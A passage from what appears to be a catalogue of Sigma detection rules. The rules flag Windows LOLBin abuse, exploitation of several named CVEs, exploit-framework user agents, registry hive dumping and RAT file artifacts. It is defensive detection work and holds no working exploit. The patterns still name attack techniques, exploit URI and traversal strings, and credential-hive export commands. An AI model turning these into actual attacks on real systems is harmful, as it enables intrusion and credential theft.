- '\pwsh.exe'
CommandLine|contains:
- '-f C:\Users\Public'
- '-f "C:\Users\Public'
- '-f %Public%'
- '-fi C:\Users\Public'
- '-fi "C:\Users\Public'
- '-fi %Public%'
- '-fil C:\Users\Public'
- '-fil "C:\Users\Public'
- '-fil %Public%'
- '-file C:\Users\Public'
- '-file "C:\Users\Public'
- '-file %Public%'
condition: selection
falsepositives:
- Unlikely
level: high
Convert to SIEM query
high
Execution via WorkFolders.exe
Detects using WorkFolders.exe to execute an arbitrary control.exe
view Sigma YAML
title: Execution via WorkFolders.exe
id: 0bbc6369-43e3-453d-9944-cae58821c173
status: test
description: Detects using WorkFolders.exe to execute an arbitrary control.exe
references:
- https://twitter.com/elliotkillick/status/1449812843772227588
author: Maxime Thiebaut (@0xThiebaut)
date: 2021-10-21
modified: 2022-12-25
tags:
- attack.stealth
- attack.t1218
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith: '\control.exe'
ParentImage|endswith: '\WorkFolders.exe'
filter:
Image: 'C:\Windows\System32\control.exe'
condition: selection and not filter
falsepositives:
- Legitimate usage of the uncommon Windows Work Folders feature.
level: high
Convert to SIEM query
high
Execution via stordiag.exe
Detects the use of stordiag.exe to execute schtasks.exe systeminfo.exe and fltmc.exe
view Sigma YAML
title: Execution via stordiag.exe
id: 961e0abb-1b1e-4c84-a453-aafe56ad0d34
status: test
description: Detects the use of stordiag.exe to execute schtasks.exe systeminfo.exe and fltmc.exe
references:
- https://strontic.github.io/xcyclopedia/library/stordiag.exe-1F08FC87C373673944F6A7E8B18CD845.html
- https://twitter.com/eral4m/status/1451112385041911809
author: Austin Songer (@austinsonger)
date: 2021-10-21
modified: 2022-12-25
tags:
- attack.stealth
- attack.t1218
logsource:
category: process_creation
product: windows
detection:
selection:
ParentImage|endswith: '\stordiag.exe'
Image|endswith:
- '\schtasks.exe'
- '\systeminfo.exe'
- '\fltmc.exe'
filter:
ParentImage|startswith: # as first is "Copy c:\windows\system32\stordiag.exe to a folder"
- 'c:\windows\system32\'
- 'c:\windows\syswow64\'
condition: selection and not filter
falsepositives:
- Legitimate usage of stordiag.exe.
level: high
Convert to SIEM query
high
Exploit Framework User Agent
Detects suspicious user agent strings used by exploit / pentest frameworks like Metasploit in proxy logs
view Sigma YAML
title: Exploit Framework User Agent
id: fdd1bfb5-f60b-4a35-910e-f36ed3d0b32f
status: test
description: Detects suspicious user agent strings used by exploit / pentest frameworks like Metasploit in proxy logs
references:
- https://blog.didierstevens.com/2015/03/16/quickpost-metasploit-user-agent-strings/
author: Florian Roth (Nextron Systems)
date: 2017-07-08
modified: 2025-01-18
tags:
- attack.command-and-control
- attack.t1071.001
logsource:
category: proxy
detection:
selection:
c-useragent:
# Cobalt Strike https://www.cobaltstrike.com/help-malleable-c2
- 'Internet Explorer *'
- 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)' # https://bluescreenofjeff.com/2016-06-28-cobalt-strike-http-c2-redirectors-with-apache-mod_rewrite/
# Metasploit Framework - Analysis by Didier Stevens https://blog.didierstevens.com/2015/03/16/quickpost-metasploit-user-agent-strings/
- 'Mozilla/4.0 (compatible; Metasploit RSPEC)'
- 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)'
- 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)' # old browser, rare, base-lining needed
- 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)' # old browser, rare, base-lining needed
- 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)' # old browser, rare, base-lining needed
- 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; SIMBAR={7DB0F6DE-8DE7-4841-9084-28FA914B0F2E}; SLCC1; .N'
- 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)' # only use in proxy logs - not for detection in web server logs
- 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/4.0.221.6 Safari/525.13'
- 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MAAU)' # Payloads
# Metasploit Update by Florian Roth 08.07.2017
- 'Mozilla/5.0'
- 'Mozilla/4.0 (compatible; SPIPE/1.0'
# - 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)' # too many false positives expected
# - 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko' # too many false positives expected
- 'Mozilla/5.0 (Windows NT 6.3; rv:39.0) Gecko/20100101 Firefox/35.0'
- 'Sametime Community Agent' # Unknown if prone to false positives - https://github.com/rapid7/metasploit-framework/blob/97095ab3113de2f046e64a64c461a1f888554401/modules/exploits/windows/http/steamcast_useragent.rb
- 'X-FORWARDED-FOR'
- 'DotDotPwn v2.1'
- 'SIPDROID'
- 'Mozilla/5.0 (Windows NT 10.0; Win32; x32; rv:60.0)' # CobaltStrike https://unit42.paloaltonetworks.com/tracking-oceanlotus-new-downloader-kerrdown/
# Empire
- 'Mozilla/6.0 (X11; Linux x86_64; rv:24.0) Gecko/20140205 Firefox/27.0 Iceweasel/25.3.0'
# Exploits
- '*wordpress hash grabber*'
- '*exploit*'
# Havoc
- 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36' # https://github.com/HavocFramework/Havoc/issues/519
condition: selection
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
Exploitation Activity of CVE-2025-59287 - WSUS Deserialization
Detects cast exceptions in Windows Server Update Services (WSUS) application logs that highly indicate exploitation attempts of CVE-2025-59287, a deserialization vulnerability in WSUS.
view Sigma YAML
title: Exploitation Activity of CVE-2025-59287 - WSUS Deserialization
id: e5f66e87-7d6b-404f-92fe-7aa67814b5cd
status: experimental
description: |
Detects cast exceptions in Windows Server Update Services (WSUS) application logs that highly indicate exploitation attempts of CVE-2025-59287, a deserialization vulnerability in WSUS.
references:
- https://unit42.paloaltonetworks.com/cve-2025-59287/
- https://hawktrace.com/blog/CVE-2025-59287-UNAUTH
- https://github.com/0xBruno/WSUSploit.NET/tree/e239bce9d6b5f46a346e1e4c4d5e0a2a20d5c639
- https://www.huntress.com/blog/exploitation-of-windows-server-update-services-remote-code-execution-vulnerability
author: Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2025-10-31
tags:
- attack.execution
- attack.initial-access
- attack.t1190
- attack.t1203
- cve.2025-59287
- detection.emerging-threats
logsource:
product: windows
service: application
detection:
selection:
Provider_Name: 'Windows Server Update Services'
EventID: 7053
Data|contains|all:
# Indicators of untrusted deserialization exploitation attempts
# https://github.com/pwntester/ysoserial.net/issues/114
- 'System.InvalidCastException'
- 'System.Windows.Data.ObjectDataProvider'
- 'Unable to cast object of type'
- 'System.Windows.Media.Brush'
condition: selection
falsepositives:
- Legitimate WSUS operations that may trigger similar error messages
level: high
Convert to SIEM query
high
Exploitation Activity of CVE-2025-59287 - WSUS Suspicious Child Process
Detects the creation of command-line interpreters (cmd.exe, powershell.exe) as child processes of Windows Server Update Services (WSUS) related process wsusservice.exe.
This behavior is a key indicator of exploitation for the critical remote code execution vulnerability such as CVE-2025-59287, where attackers spawn shells to conduct reconnaissance and further post-exploitation activities.
view Sigma YAML
title: Exploitation Activity of CVE-2025-59287 - WSUS Suspicious Child Process
id: 43259cc4-1b80-4931-bd98-baea01afc196
status: experimental
description: |
Detects the creation of command-line interpreters (cmd.exe, powershell.exe) as child processes of Windows Server Update Services (WSUS) related process wsusservice.exe.
This behavior is a key indicator of exploitation for the critical remote code execution vulnerability such as CVE-2025-59287, where attackers spawn shells to conduct reconnaissance and further post-exploitation activities.
references:
- https://unit42.paloaltonetworks.com/microsoft-cve-2025-59287/
- https://www.huntress.com/blog/exploitation-of-windows-server-update-services-remote-code-execution-vulnerability
- https://hawktrace.com/blog/CVE-2025-59287-UNAUTH
author: Huntress Labs, Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2025-10-31
tags:
- attack.execution
- attack.initial-access
- attack.t1190
- attack.t1203
- cve.2025-59287
- detection.emerging-threats
logsource:
category: process_creation
product: windows
detection:
selection_parent_wsusservice:
ParentImage|endswith: '\wsusservice.exe'
selection_parent_w3wp_wsuspool:
ParentImage|endswith: '\w3wp.exe'
ParentCommandLine|contains: 'WsusPool'
selection_child:
Image|endswith:
- '\cmd.exe'
- '\powershell.exe'
- '\pwsh.exe'
- '\powershell_ise.exe'
condition: 1 of selection_parent_* and selection_child
falsepositives:
- If this activity is expected, consider filtering based on specific command lines, user context (e.g., `nt authority\network service`), or parent process command lines to reduce noise.
level: high
Convert to SIEM query
high
Exploitation Attempt Of CVE-2020-1472 - Execution of ZeroLogon PoC
Detects the execution of the commonly used ZeroLogon PoC executable.
view Sigma YAML
title: Exploitation Attempt Of CVE-2020-1472 - Execution of ZeroLogon PoC
id: dcc6a01e-9471-44a0-a699-71ea96f8ed8b
status: test
description: Detects the execution of the commonly used ZeroLogon PoC executable.
references:
- https://thedfirreport.com/2021/11/01/from-zero-to-domain-admin/
- https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/
author: '@Kostastsale, TheDFIRReport'
date: 2022-02-12
tags:
- attack.execution
- attack.lateral-movement
- attack.t1210
- cve.2020-1472
- detection.emerging-threats
logsource:
product: windows
category: process_creation
detection:
selection_main:
ParentImage|endswith: '\cmd.exe'
Image|endswith:
- '\cool.exe'
- '\zero.exe'
CommandLine|contains|all:
- 'Administrator'
- '-c'
selection_payloads_1:
CommandLine|contains|all:
- 'taskkill'
- '/f'
- '/im'
selection_payloads_2:
CommandLine|contains: 'powershell'
condition: selection_main and 1 of selection_payloads_*
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
Exploitation Attempt Of CVE-2023-46214 Using Public POC Code
Detects exploitation attempt of CVE-2023-46214, a remote code execution (RCE) in Splunk Enterprise through insecure XML parsing using known public proof of concept code
view Sigma YAML
title: Exploitation Attempt Of CVE-2023-46214 Using Public POC Code
id: ba5268de-4dd4-4d5c-8a90-2b5e6dc1aff8
related:
- id: 04017cd5-621e-4ec4-a762-1f042fe3d3e5
type: derived
status: test
description: |
Detects exploitation attempt of CVE-2023-46214, a remote code execution (RCE) in Splunk Enterprise through insecure XML parsing using known public proof of concept code
references:
- https://github.com/nathan31337/Splunk-RCE-poc/
- https://blog.hrncirik.net/cve-2023-46214-analysis
- https://advisory.splunk.com/advisories/SVD-2023-1104
author: Lars B. P. Frydenskov(Trifork Security)
date: 2023-11-27
tags:
- attack.lateral-movement
- attack.t1210
- cve.2023-46214
- detection.emerging-threats
logsource:
category: webserver
detection:
selection_method_and_response:
cs-method: POST
sc-status:
- 200
- 302
selection_uri_upload:
cs-uri-stem|contains: '/splunkd/__upload/indexing/preview'
cs-uri-query|contains|all:
- 'NO_BINARY_CHECK=1'
- 'input.path=shell.xsl'
selection_uri_search:
cs-uri-stem|contains|all:
- '/api/search/jobs'
- '/results'
cs-uri-query|contains|all:
- '/opt/splunk/var/run/splunk/dispatch/'
- '/shell.xsl'
condition: selection_method_and_response and 1 of selection_uri_*
falsepositives:
- Unlikely
level: high
Convert to SIEM query
high
Exploitation Indicator Of CVE-2022-42475
Detects exploitation indicators of CVE-2022-42475 a heap-based buffer overflow in sslvpnd.
view Sigma YAML
title: Exploitation Indicator Of CVE-2022-42475
id: 293ccb8c-bed8-4868-8296-bef30e303b7e
status: test
description: Detects exploitation indicators of CVE-2022-42475 a heap-based buffer overflow in sslvpnd.
references:
- https://www.fortiguard.com/psirt/FG-IR-22-398
- https://www.bleepingcomputer.com/news/security/fortinet-says-ssl-vpn-pre-auth-rce-bug-is-exploited-in-attacks/
- https://www.deepwatch.com/labs/customer-advisory-fortios-ssl-vpn-vulnerability-cve-2022-42475-exploited-in-the-wild/
- https://community.fortinet.com/t5/FortiGate/Technical-Tip-Critical-vulnerability-Protect-against-heap-based/ta-p/239420
author: Nasreddine Bencherchali (Nextron Systems), Nilaa Maharjan, Douglasrose75
date: 2024-02-08
tags:
- attack.initial-access
- cve.2022-42475
- detection.emerging-threats
logsource:
product: fortios
service: sslvpnd
definition: 'Requirements: file creation events or equivalent must be collected from the FortiOS SSL-VPN appliance in order for this detection to function correctly'
detection:
keywords:
- '/data/etc/wxd.conf'
- '/data/lib/libgif.so'
- '/data/lib/libips.bak'
- '/data/lib/libiptcp.so'
- '/data/lib/libipudp.so'
- '/data/lib/libjepg.so'
- '/var/.sslvpnconfigbk'
condition: keywords
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
Exploitation Indicators Of CVE-2023-20198
Detecting exploitation indicators of CVE-2023-20198 a privilege escalation vulnerability in Cisco IOS XE Software Web UI.
view Sigma YAML
title: Exploitation Indicators Of CVE-2023-20198
id: 2ece8816-b7a0-4d9b-b0e8-ae7ad18bc02b
status: test
description: Detecting exploitation indicators of CVE-2023-20198 a privilege escalation vulnerability in Cisco IOS XE Software Web UI.
references:
- https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z
- https://www.thestack.technology/security-experts-call-for-incident-response-exercises-after-mass-cisco-device-exploitation/
author: Lars B. P. Frydenskov (Trifork Security)
date: 2023-10-20
tags:
- attack.privilege-escalation
- attack.initial-access
- detection.emerging-threats
logsource:
product: cisco
service: syslog
definition: 'Requirements: Cisco IOS XE system logs needs to be configured and ingested'
detection:
keyword_event:
- '%WEBUI-6-INSTALL_OPERATION_INFO:'
- '%SYS-5-CONFIG_P:'
- '%SEC_LOGIN-5-WEBLOGIN_SUCCESS:'
keyword_user:
- 'cisco_tac_admin'
- 'cisco_support'
- 'cisco_sys_manager'
condition: keyword_event and keyword_user
falsepositives:
- Rare false positives might occur if there are valid users named "cisco_tac_admin" or "cisco_support", which are not created by default or CISCO representatives
level: high
Convert to SIEM query
high
Exploitation of CVE-2021-26814 in Wazuh
Detects the exploitation of the Wazuh RCE vulnerability described in CVE-2021-26814
view Sigma YAML
title: Exploitation of CVE-2021-26814 in Wazuh
id: b9888738-29ed-4c54-96a4-f38c57b84bb3
status: test
description: Detects the exploitation of the Wazuh RCE vulnerability described in CVE-2021-26814
references:
- https://github.com/WickdDavid/CVE-2021-26814/blob/6a17355a10ec4db771d0f112cbe031e418d829d5/PoC.py
author: Florian Roth (Nextron Systems)
date: 2021-05-22
modified: 2023-01-02
tags:
- attack.initial-access
- attack.t1190
- cve.2021-21978
- cve.2021-26814
- detection.emerging-threats
logsource:
category: webserver
detection:
selection:
cs-uri-query|contains: '/manager/files?path=etc/lists/../../../../..'
condition: selection
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
Exploited CVE-2020-10189 Zoho ManageEngine
Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189
view Sigma YAML
title: Exploited CVE-2020-10189 Zoho ManageEngine
id: 846b866e-2a57-46ee-8e16-85fa92759be7
status: test
description: Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189
references:
- https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html
- https://vulmon.com/exploitdetails?qidtp=exploitdb&qid=48224
author: Florian Roth (Nextron Systems)
date: 2020-03-25
modified: 2023-01-21
tags:
- attack.initial-access
- attack.t1190
- attack.execution
- attack.t1059.001
- attack.t1059.003
- attack.s0190
- cve.2020-10189
- detection.emerging-threats
logsource:
category: process_creation
product: windows
detection:
selection:
ParentImage|endswith: 'DesktopCentral_Server\jre\bin\java.exe'
Image|endswith:
- '\cmd.exe'
- '\powershell.exe'
- '\pwsh.exe'
- '\bitsadmin.exe'
- '\systeminfo.exe'
- '\net.exe'
- '\net1.exe'
- '\reg.exe'
- '\query.exe'
condition: selection
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
Exploiting SetupComplete.cmd CVE-2019-1378
Detects exploitation attempt of privilege escalation vulnerability via SetupComplete.cmd and PartnerSetupComplete.cmd described in CVE-2019-1378
view Sigma YAML
title: Exploiting SetupComplete.cmd CVE-2019-1378
id: 1c373b6d-76ce-4553-997d-8c1da9a6b5f5
status: test
description: Detects exploitation attempt of privilege escalation vulnerability via SetupComplete.cmd and PartnerSetupComplete.cmd described in CVE-2019-1378
references:
- https://web.archive.org/web/20200530031708/https://www.embercybersecurity.com/blog/cve-2019-1378-exploiting-an-access-control-privilege-escalation-vulnerability-in-windows-10-update-assistant-wua
author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro
date: 2019-11-15
modified: 2021-11-27
tags:
- attack.persistence
- attack.privilege-escalation
- attack.stealth
- attack.t1068
- attack.execution
- attack.t1059.003
- attack.t1574
- cve.2019-1378
- detection.emerging-threats
logsource:
category: process_creation
product: windows
detection:
selection:
ParentCommandLine|contains|all:
- '\cmd.exe'
- '/c'
- 'C:\Windows\Setup\Scripts\'
ParentCommandLine|endswith:
- 'SetupComplete.cmd'
- 'PartnerSetupComplete.cmd'
filter:
Image|startswith:
- 'C:\Windows\System32\'
- 'C:\Windows\SysWOW64\'
- 'C:\Windows\WinSxS\'
- 'C:\Windows\Setup\'
condition: selection and not filter
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
Explorer NOUACCHECK Flag
Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag that allows to run all sub processes of that newly started explorer.exe without any UAC checks
view Sigma YAML
title: Explorer NOUACCHECK Flag
id: 534f2ef7-e8a2-4433-816d-c91bccde289b
status: test
description: Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag that allows to run all sub processes of that newly started explorer.exe without any UAC checks
references:
- https://twitter.com/ORCA6665/status/1496478087244095491
author: Florian Roth (Nextron Systems)
date: 2022-02-23
modified: 2022-04-21
tags:
- attack.privilege-escalation
- attack.t1548.002
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith: '\explorer.exe'
CommandLine|contains: '/NOUACCHECK'
filter_dc_logon:
- ParentCommandLine: 'C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule'
- ParentImage: 'C:\Windows\System32\svchost.exe' # coarse filter needed for ID 4688 Events
condition: selection and not 1 of filter_*
falsepositives:
- Domain Controller User Logon
- Unknown how many legitimate software products use that method
level: high
Convert to SIEM query
high
Exports Critical Registry Keys To a File
Detects the export of a crital Registry key to a file.
view Sigma YAML
title: Exports Critical Registry Keys To a File
id: 82880171-b475-4201-b811-e9c826cd5eaa
related:
- id: f0e53e89-8d22-46ea-9db5-9d4796ee2f8a
type: similar
status: test
description: Detects the export of a crital Registry key to a file.
references:
- https://lolbas-project.github.io/lolbas/Binaries/Regedit/
- https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
author: Oddvar Moe, Sander Wiebing, oscd.community
date: 2020-10-12
modified: 2024-03-13
tags:
- attack.exfiltration
- attack.discovery
- attack.t1012
logsource:
category: process_creation
product: windows
detection:
selection_img:
- Image|endswith: '\regedit.exe'
- OriginalFileName: 'REGEDIT.EXE'
selection_cli_1:
CommandLine|contains|windash: ' -E '
selection_cli_2:
CommandLine|contains:
- 'hklm'
- 'hkey_local_machine'
selection_cli_3:
CommandLine|endswith:
- '\system'
- '\sam'
- '\security'
condition: all of selection_*
falsepositives:
- Dumping hives for legitimate purpouse i.e. backup or forensic investigation
level: high
Convert to SIEM query
high
Exports Registry Key To an Alternate Data Stream
Exports the target Registry key and hides it in the specified alternate data stream.
view Sigma YAML
title: Exports Registry Key To an Alternate Data Stream
id: 0d7a9363-af70-4e7b-a3b7-1a176b7fbe84
status: test
description: Exports the target Registry key and hides it in the specified alternate data stream.
references:
- https://lolbas-project.github.io/lolbas/Binaries/Regedit/
- https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
author: Oddvar Moe, Sander Wiebing, oscd.community
date: 2020-10-07
modified: 2021-11-27
tags:
- attack.stealth
- attack.t1564.004
logsource:
product: windows
category: create_stream_hash
detection:
selection:
Image|endswith: '\regedit.exe'
condition: selection
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
External Remote SMB Logon from Public IP
Detects successful logon from public IP address via SMB. This can indicate a publicly-exposed SMB port.
view Sigma YAML
title: External Remote SMB Logon from Public IP
id: 78d5cab4-557e-454f-9fb9-a222bd0d5edc
related:
- id: 259a9cdf-c4dd-4fa2-b243-2269e5ab18a2
type: derived
status: test
description: Detects successful logon from public IP address via SMB. This can indicate a publicly-exposed SMB port.
references:
- https://www.inversecos.com/2020/04/successful-4624-anonymous-logons-to.html
- https://twitter.com/Purp1eW0lf/status/1616144561965002752
author: Micah Babinski (@micahbabinski), Zach Mathis (@yamatosecurity)
date: 2023-01-19
modified: 2024-03-11
tags:
- attack.privilege-escalation
- attack.persistence
- attack.initial-access
- attack.credential-access
- attack.stealth
- attack.t1133
- attack.t1078
- attack.t1110
logsource:
product: windows
service: security
detection:
selection:
EventID: 4624
LogonType: 3
filter_main_local_ranges:
IpAddress|cidr:
- '::1/128' # IPv6 loopback
- '10.0.0.0/8'
- '127.0.0.0/8'
- '172.16.0.0/12'
- '192.168.0.0/16'
- '169.254.0.0/16'
- 'fc00::/7' # IPv6 private addresses
- 'fe80::/10' # IPv6 link-local addresses
filter_main_empty:
IpAddress: '-'
condition: selection and not 1 of filter_main_*
falsepositives:
- Legitimate or intentional inbound connections from public IP addresses on the SMB port.
level: high
Convert to SIEM query
high
Failed MSExchange Transport Agent Installation
Detects a failed installation of a Exchange Transport Agent
view Sigma YAML
title: Failed MSExchange Transport Agent Installation
id: c7d16cae-aaf3-42e5-9c1c-fb8553faa6fa
status: test
description: Detects a failed installation of a Exchange Transport Agent
references:
- https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=8
author: Tobias Michalski (Nextron Systems)
date: 2021-06-08
modified: 2022-07-12
tags:
- attack.persistence
- attack.t1505.002
logsource:
service: msexchange-management
product: windows
# warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly
detection:
selection:
EventID: 6
Data|contains: 'Install-TransportAgent'
condition: selection
falsepositives:
- Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this.
level: high
Convert to SIEM query
high
FakeUpdates/SocGholish Activity
Detects initial execution of FakeUpdates/SocGholish malware via wscript that later executes commands via cmd or powershell.
view Sigma YAML
title: FakeUpdates/SocGholish Activity
id: 97805087-93ab-4203-b5cb-287cda6aecaa
status: test
description: Detects initial execution of FakeUpdates/SocGholish malware via wscript that later executes commands via cmd or powershell.
references:
- https://twitter.com/th3_protoCOL/status/1536788652889497600
- https://twitter.com/1ZRR4H/status/1537501582727778304
author: '@kostastsale'
date: 2022-06-16
modified: 2024-08-23
tags:
- attack.execution
- attack.t1059.001
- detection.emerging-threats
logsource:
category: process_creation
product: windows
detection:
selection:
ParentImage|endswith: '\wscript.exe'
ParentCommandLine|contains|all:
- '\AppData\Local\Temp'
- '.zip'
- 'update'
- '.js'
ParentCommandLine|contains:
- 'Chrome'
- 'Edge'
- 'Firefox'
- 'Opera'
- 'Brave' # Not seen in campaigns
- 'Vivaldi' # Not seen in campaigns
Image|endswith:
- '\cmd.exe'
- '\powershell.exe'
- '\pwsh.exe'
condition: selection
falsepositives:
- Unlikely
level: high
Convert to SIEM query
high
Fax Service DLL Search Order Hijack
The Fax service attempts to load ualapi.dll, which is non-existent. An attacker can then (side)load their own malicious DLL using this service.
view Sigma YAML
title: Fax Service DLL Search Order Hijack
id: 828af599-4c53-4ed2-ba4a-a9f835c434ea
status: test
description: The Fax service attempts to load ualapi.dll, which is non-existent. An attacker can then (side)load their own malicious DLL using this service.
references:
- https://windows-internals.com/faxing-your-way-to-system/
author: NVISO
date: 2020-05-04
modified: 2022-06-02
tags:
- attack.privilege-escalation
- attack.persistence
- attack.execution
- attack.stealth
- attack.t1574.001
logsource:
category: image_load
product: windows
detection:
selection:
Image|endswith: '\fxssvc.exe'
ImageLoaded|endswith: 'ualapi.dll'
filter:
ImageLoaded|startswith: 'C:\Windows\WinSxS\'
condition: selection and not filter
falsepositives:
- Unlikely
level: high
Convert to SIEM query
high
File Creation In Suspicious Directory By Msdt.EXE
Detects msdt.exe creating files in suspicious directories which could be a sign of exploitation of either Follina or Dogwalk vulnerabilities
view Sigma YAML
title: File Creation In Suspicious Directory By Msdt.EXE
id: 318557a5-150c-4c8d-b70e-a9910e199857
status: test
description: Detects msdt.exe creating files in suspicious directories which could be a sign of exploitation of either Follina or Dogwalk vulnerabilities
references:
- https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd
- https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/
author: Vadim Varganov, Florian Roth (Nextron Systems)
date: 2022-08-24
modified: 2023-02-23
tags:
- attack.privilege-escalation
- attack.persistence
- attack.t1547.001
- cve.2022-30190
logsource:
category: file_event
product: windows
detection:
selection:
Image|endswith: '\msdt.exe'
TargetFilename|contains:
- '\Desktop\'
- '\Start Menu\Programs\Startup\'
- 'C:\PerfLogs\'
- 'C:\ProgramData\'
- 'C:\Users\Public\'
condition: selection
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
File Creation Related To RAT Clients
File .conf created related to VenomRAT, AsyncRAT and Lummac samples observed in the wild.
view Sigma YAML
title: File Creation Related To RAT Clients
id: 2f3039c8-e8fe-43a9-b5cf-dcd424a2522d
status: experimental
description: |
File .conf created related to VenomRAT, AsyncRAT and Lummac samples observed in the wild.
references:
- https://www.virustotal.com/gui/file/c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761
- https://www.virustotal.com/gui/file/e96a0c1bc5f720d7f0a53f72e5bb424163c943c24a437b1065957a79f5872675
author: Joseliyo Sanchez, @Joseliyo_Jstnk
date: 2024-12-19
tags:
- attack.execution
- detection.emerging-threats
logsource:
category: file_event
product: windows
detection:
# VT Query: behaviour_files:"\\AppData\\Roaming\\DataLogs\\DataLogs.conf"
# VT Query: behaviour_files:"DataLogs.conf" or behaviour_files:"hvnc.conf" or behaviour_files:"dcrat.conf"
selection_required:
TargetFilename|contains: '\AppData\Roaming\'
selection_variants:
TargetFilename|contains:
- '\mydata\'
- '\datalogs\'
- '\hvnc\'
- '\dcrat\'
TargetFilename|endswith:
- '\datalogs.conf'
- '\hvnc.conf'
- '\dcrat.conf'
condition: all of selection_*
falsepositives:
- Legitimate software creating a file with the same name
level: high
Convert to SIEM query
high
File Decoded From Base64/Hex Via Certutil.EXE
Detects the execution of certutil with either the "decode" or "decodehex" flags to decode base64 or hex encoded files. This can be abused by attackers to decode an encoded payload before execution
view Sigma YAML
title: File Decoded From Base64/Hex Via Certutil.EXE
id: cc9cbe82-7bc0-4ef5-bc23-bbfb83947be7
status: test
description: Detects the execution of certutil with either the "decode" or "decodehex" flags to decode base64 or hex encoded files. This can be abused by attackers to decode an encoded payload before execution
references:
- https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certutil
- https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/
- https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/
- https://twitter.com/JohnLaTwC/status/835149808817991680
- https://learn.microsoft.com/en-us/archive/blogs/pki/basic-crl-checking-with-certutil
- https://lolbas-project.github.io/lolbas/Binaries/Certutil/
author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community
date: 2023-02-15
modified: 2025-06-04
tags:
- attack.stealth
- attack.t1027
logsource:
category: process_creation
product: windows
detection:
selection_img:
- Image|endswith: '\certutil.exe'
- OriginalFileName: 'CertUtil.exe'
selection_cli:
CommandLine|contains|windash:
- '-decode ' # Decode Base64
- '-decodehex ' # Decode Hex
condition: all of selection_*
falsepositives:
- Unknown
level: high
regression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_certutil_decode/info.yml
Convert to SIEM query
high
File Download And Execution Via IEExec.EXE
Detects execution of the IEExec utility to download and execute files
view Sigma YAML
title: File Download And Execution Via IEExec.EXE
id: 9801abb8-e297-4dbf-9fbd-57dde0e830ad
status: test
description: Detects execution of the IEExec utility to download and execute files
references:
- https://lolbas-project.github.io/lolbas/Binaries/Ieexec/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-05-16
modified: 2023-11-09
tags:
- attack.command-and-control
- attack.t1105
logsource:
category: process_creation
product: windows
detection:
selection_img:
- Image|endswith: '\IEExec.exe'
- OriginalFileName: 'IEExec.exe'
selection_cli:
CommandLine|contains:
- 'http://'
- 'https://'
condition: all of selection_*
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
File Download From IP Based URL Via CertOC.EXE
Detects when a user downloads a file from an IP based URL using CertOC.exe
view Sigma YAML
title: File Download From IP Based URL Via CertOC.EXE
id: b86f6dea-0b2f-41f5-bdcc-a057bd19cd6a
related:
- id: 70ad0861-d1fe-491c-a45f-fa48148a300d
type: similar
status: test
description: Detects when a user downloads a file from an IP based URL using CertOC.exe
references:
- https://lolbas-project.github.io/lolbas/Binaries/Certoc/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-10-18
tags:
- attack.command-and-control
- attack.execution
- attack.t1105
logsource:
category: process_creation
product: windows
detection:
selection_img:
- Image|endswith: '\certoc.exe'
- OriginalFileName: 'CertOC.exe'
selection_ip:
CommandLine|re: '://[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}'
selection_cli:
CommandLine|contains: '-GetCACAPS'
condition: all of selection*
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
